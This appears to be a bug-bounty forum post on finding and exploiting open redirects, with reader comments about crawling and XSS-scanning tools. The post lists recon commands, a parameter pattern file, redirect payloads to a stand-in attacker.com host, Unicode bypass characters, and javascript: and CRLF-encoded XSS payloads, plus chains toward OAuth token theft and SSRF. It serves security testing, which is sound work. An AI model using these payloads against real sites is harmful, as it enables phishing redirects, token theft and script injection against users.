Open Redirection Guide

Identifing possible vulnerable endpoints:

• gau or waybackurls + hakrawler + gf

  1. cat subdomains | gau | tee -a urls
  2. cat subdomains | hakrawler -depth 3 -plain | tee -a urls
  3. gf redirect urls

  using redirect.json with gf:

{
    "flags" : "-HanrE",
    "pattern" : "url=|rt=|cgi-bin/redirect.cgi|continue=|dest=|destination=|go=|out=|redir=|redirect_uri=|redirect_url=|return=|return_path=|returnTo=|rurl=|target=|view=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_url=|login_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file=|turl="
}

• Google dorks
  site:domain.com inurl:[PARAMETER] using a parameter list
• Manual inspection by navigating the webapp and intercepting the requests

Confirm and exploit:

* https://company.com/?redirect=http://attacker.com
* https://company.com/?redirect=http://company.com.attacker.com
* https://company.com/?redirect=https://[email protected]
* https://company.com/?redirect=//attacker.com
* https://company.com/?redirect=\/\/attacker.com
* https://company.com/?redirect=http://attacker.com#company.com
* https://company.com/?redirect=http://attacker.com?company.com
* https://company.com/?redirect=http://attacker.com/company.com
* https://company.com/?redirect=http://ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ

If you found a POST-based request vulnerable to open redirection,
try to turn it into a GET request by appending the POST parameters
to the URL as GET parameters.

Using special characters:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ 。

Special characters’ source

Escalating to other vulnerabilities:

Open Redirect + Miconfigured OAuth App => OAuth Token Stealing
Open Redirect + Filtered SSRF => SSRF
Open Redirect + CRLFi => XSS
Open Redirect + javascript URI => XSS

Source

Escalate to XSS

• https://company.com/?redirect=javascript:alert(1)
• https://company.com/?redirect=javascript:prompt(1)

Escalate to XSS using CRLFi

• https://company.com/?redirect=java%0d%0ascript%0d%0a:alert(0)

Thanks so much for pointing out hakrawler! Been looking for a fast go HTTP crawler like this!

Have you tried doing XSS analysis too with kxss? A similar loop?

I haven’t actually used it yet but I saw this tweet the other day and I would like to try it out

Looks really interesting.

I’d love to put together a few bug-bounty esq hacks and automation tips for pentests so I can transfer the bug-founding power of the community into something I can fire off and get alerts for.

Almost be epic to chain together a bunch of stuff and have it give us Discord notifications through a webhook everytime it finds something!

ALSO: Do you happen to know where I can find kxss?

EDIT: Found it, in toms hacks repo.

Yup! tomnomnom’s tools are sick!

I don’t know Linux or web but this looks detailed nevertheless!

I think you should use dalfox instead of kxss

Do you find it works better?

What are the key benefits / differentiators that you see?

I’ve seen it and I actually want to try it for a long time! So, will do I also sourced hahwul under the special characters

You NEED to share your findings when you get some basics up.

I didn’t try kxss but I see it as an old thing ! So no idea about the difference … but I’m sure you’ll like dalfox

fuck automation like dalfox in bbp every beginner running same tools like dalfox

It is true that many people (beginners or not) do use most famous tools and grab most low-hanging fruits. I personally use dalfox in endpoints where there is an indication of a possible XSS but I can’t pop it for some reason. Also, many beginners use dalfox but on the standard recon they do. More recon = more surface for the tool to work